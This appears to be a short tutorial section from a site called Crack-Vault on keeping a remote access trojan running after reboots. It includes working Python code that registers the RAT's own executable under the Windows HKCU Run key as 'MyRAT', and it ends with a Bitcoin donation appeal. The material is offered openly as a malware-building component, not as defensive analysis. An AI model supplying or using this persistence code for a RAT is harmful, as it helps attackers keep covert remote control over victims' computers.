Achieving Persistence via Registry Manipulation
To ensure a RAT survives system reboots, you can add it to the Windows Registry, a common persistence technique that can be easily achieved through Python.
Registry Key for Startup
The key to persistence is adding the RAT’s executable to the HKCU\Software\Microsoft\Windows\CurrentVersion\Run registry entry. This makes Windows automatically execute the RAT whenever the system starts.
Python Code for Registry Persistence:
import os
import winreg as reg
def add_to_registry():
# Path to the executable (RAT)
executable_path = os.path.abspath(__file__)
# Registry key path
key = r"Software\Microsoft\Windows\CurrentVersion\Run"
# Open the key with write access
open_key = reg.OpenKey(reg.HKEY_CURRENT_USER, key, 0, reg.KEY_SET_VALUE)
# Add the RAT to startup
reg.SetValueEx(open_key, "MyRAT", 0, reg.REG_SZ, executable_path)
reg.CloseKey(open_key)
# Call the function to ensure persistence
add_to_registry()
This code adds the RAT to the user’s startup programs by creating a registry entry. Every time the system reboots, Windows will execute the RAT from the specified path.
Support Crack-Vault and help us keep providing free tools. Every donation counts!
(BTC) Address: bc1qhhva8uplmkaa3kkwxnux9t3y6l6kmhnwqzktzn
